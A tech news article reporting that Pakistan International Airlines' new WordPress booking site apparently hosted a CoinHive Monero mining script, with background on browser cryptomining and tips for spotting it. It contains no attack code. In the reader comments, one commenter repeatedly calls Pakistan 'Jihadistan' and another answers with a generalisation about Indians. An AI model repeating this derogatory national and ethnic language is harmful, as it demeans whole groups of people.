PIA’s Official Website May be Mining Cryptocurrency Using Your Computer

PIA recently launched its new web portal for booking tickets online. Thanks to a tip we received yesterday, ProPakistani can confirm that PIA’s new website has been hosting a cryptocurrency mining script on its servers, capable of mining crypto-coins using computers of the people visiting the website.

What is Cryptocurrency Mining?

Most cryptocurrencies are obtained through a process called mining. Putting it simply, the process involves solving some complex calculations to add new coin transactions to a public ledger. Mining is a very time and resource intensive process and people who commit their hardware for this get rewarded in the form of new coins.


ALSO READ

Shocking: COMSATS University Website is Using Your PC to Mine Cryptocurrency


Is it Harmful?

It won’t harm your computer in the traditional sense like a virus would, but it will hog your PC’s resources, slowing it down considerably as long as the mining process is ongoing.

However, it is definitely unethical — no one should use your computer’s resources to mine cryptocurrency without your explicit permission.

On Monday, 12th February, ProPakistani received a tip from tip from three cybersecurity enthusiasts, Sajjad Haider, Asad Memon and Fahim Mandvia, about something fishy they found on PIA’s new website. The co-founder of RemoteInteview and the person behind JavaScript’s ‘Urdish’ dialect, Asad is a veteran programmer and developer while Sajjad Haider is an Information Security Professional.

“It seems that PIA has recently launched this new site,” he added. “It’s based on WordPress and whenever someone uses WordPress, it opens a can of worms.”

Asad sent us a link to the script, hiding in the “bootstrap.js” file within the JavaScript directory of PIA’s website. We have verified the JavaScript function is clearly designed to mine Monero, a form of cryptocurrency, on a visitor’s computer through the browser. At the time of writing, one Monero (one XMR) is worth $246.

scripts found

Moreover, they were also able to extract the CoinHive user ID of the miner in question hiding in another JavaScript file in the parent directory.

CoinHive, an online service, offers a JavaScript miner for the Monero Blockchain that can be embedded on any website.

The script can then run directly from the browser to mine cryptocurrency on the computers of the users who visit the website.

Barely a couple of hours after we checked it out, both the files were modified and are now inaccessible on PIA’s website (last modified at 9:11 PM, Monday, 12th February).

Fortunately, Asad was able to find an archived version of the website which has both the files. Not only that, but the archival service also shows a clear warning that it has detected malicious behavior on the website that matches CoinHive’s JavaScript variables.

Malicious behavior and content int piac official website

It is extremely unlikely that PIA itself would try to embed cryptocurrency mining scripts in its official website. Not only does it seem reckless, it is also somewhat pointless, considering that the website would barely make 1-2 XMRs per month ($250 – $500 according to a rough estimate).

“It’s most likely a hack or a greedy employee,” added Asad.

Regardless, a company of such a stature should keep an eye on its web portal. Recently, more and more websites have been caught trying to run mining scripts on unsuspecting users.

If you suspect your computer is acting somewhat slow, you can run your browser’s task manager (SHIFT + ESC in chrome) to check if a particular tab is using too many resources. Moreover, you can also use ad-blockers to detect if a mining script is running in a tab or use the No Coin extension for Chrome/Firefox.


  • Muhammad Ashraf

    crypto currency usually requires graphics cards or special hardware how come they can be generated from normal computer having very nominal resources

    • Asad Memon

      Monero is designed to be mined on CPU alone. Which makes it great for this.

    • continuedhere

      If you could remotely steal one rupee from every person in Jihadistan without facing any consequences would you say that is a lucrative crime? This is a bit like that except that you are only stealing from every visitor to that specific site.

    • Ifhrmf

      It is simple the more traffic you have the more power you get, Its like getting 100% from one resource, it is hunting few percents from each visitor…

    • muhammadbilal

      It can be mined even from your smartphone, it just needs a computer. GPUs have much powerful processor that’s why they are mostly used. But if there are 100s of low power computers mining at the same time, it will result 50-80% of 1 GPU

  • continuedhere

    It would have been simpler to just say that pia’s website was hacked. It’s not unusual for Jihadistani websites to get hacked because management doesn’t care and employees are incompetent. Often even the developers don’t care. I remember reporting that superasia’s site was hacked to their whois email address. I don’t think the dev’s fixed it in a timely manner.

    • FuriousNinja

      What you are saying might be true but utter contempt is shown when you cant even properly mention the country’s name due to your biased opinion.

      Are you Indian? Because it is the typical behavior shown by some of them.

  • Nain Ali

    Correct me if I’m wrong their website is based on .NET not on WordPress??? I mean PIA wordpress would be really “A bail mujhay mar” website. Prone to really big hacks and leak of customer information.

    • Rehan Ahmed

      Exactly – it’s baffling. And yes, it is definitely using WordPress – verified it.

      • Gemini

        Verify karnay ki kya zaroorat hai ye template buhat dekh chuka hoo :D

        • Gemini

          I am running more than 100 wordpress websites, and not 1 have been hacked till today. There are precautions which can save you from attacks. But these noob developers from “5000 main website banwaye doesn’t even care to check these loop holes.”

    • Gemini

      Even this website ProPakistani is using wordpress as well and they didn’t have changed their login url /wp-admin yet which is the first step to get attacked lol.

  • Hamza

    The error tells you alot, the site is deployed by XAMPP Path and other info

    C:xampphtdocspianewwp-contentthemespiaxd

    It looks like they dont want to invest in right deployment for things. A proper linux owner to maintain the site, harden it etc.